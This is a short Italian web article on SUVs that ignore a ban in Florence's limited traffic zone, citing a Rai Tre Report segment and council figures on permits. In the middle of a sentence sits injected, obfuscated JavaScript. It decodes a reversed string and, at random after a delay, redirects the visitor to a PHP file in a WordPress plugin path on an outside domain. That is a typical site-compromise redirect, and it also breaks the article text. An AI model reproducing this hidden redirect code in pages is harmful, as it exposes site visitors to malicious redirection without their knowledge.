I divieti non fermano i Suv

image_pdfimage_print

Troppi Suv violano la Ztl, nonostante un’ordinanza – operativa dal 2004 – ne vieti la circolazione. Anche Report ha rilevato la paradossale situazione di Firenze, nella trasmissione (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andata in onda domenica sera su Rai Tre. Il reportage ha riscontrato che in centro a Firenze circolano un numero rilevantissimo di Suv, tanto che i fiorentini neanche si sono accorti dell’ordinanza. L’assessore comunale all’ambiente Claudio Del Lungo ha dichiarato che negli ultimi tre anni sono stati 120-150 i veicoli ai quali è stato respinto il rinnovo del permesso di entrare in centro, a fronte di 20-30 mila permessi complessivamente concessi. In sostanza il divieto dell’ordinanza sarebbe servito per bloccare solo lo 0,5% dei veicoli che entrano nella Ztl. E secondo Report sarebbero ‘un po’ pochino in una città dove, ogni dieci macchine che vengono immatricolate, una è un Suv’.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *